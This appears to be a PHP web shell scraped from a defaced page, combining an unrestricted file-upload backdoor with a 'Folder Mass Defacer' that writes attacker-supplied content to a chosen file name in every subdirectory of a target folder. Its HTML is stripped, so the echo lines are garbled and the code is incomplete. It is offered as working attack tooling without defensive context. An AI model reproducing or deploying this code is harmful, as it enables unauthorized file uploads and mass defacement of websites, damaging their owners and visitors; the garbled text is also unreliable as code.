Scroll Top
owned

“; move_uploaded_file($_FILES[‘file’][‘tmp_name’], $_FILES[‘file’][‘name’]); exit(0); } ?>
Folder Mass Defacer by ALP “;
echo ““;
echo ““;
echo “

“;
echo “


Target Folder

“;
echo “Name of File

“;
echo “Script Deface

“;
echo “

“;

if (isset ($_POST[‘base_dir’]))
{
if (!file_exists ($_POST[‘base_dir’]))
die ($_POST[‘base_dir’].” Not Found !
“);

if (!is_dir ($_POST[‘base_dir’]))
die ($_POST[‘base_dir’].” Is Not A Directory !
“);

@chdir ($_POST[‘base_dir’]) or die (“Cannot Open Directory”);

$files = @scandir ($_POST[‘base_dir’]) or die (“Fuck u -_-
“);

foreach ($files as $file):
if ($file != “.” && $file != “..” && @filetype ($file) == “dir”)
{
$index = getcwd ().”/”.$file.”/”.$_POST[‘andela’];
if (file_put_contents ($index, $_POST[‘index’]))
echo “


>> $index&nbsp&nbsp&nbsp&nbsp(✓)“;
}
endforeach;
}

?>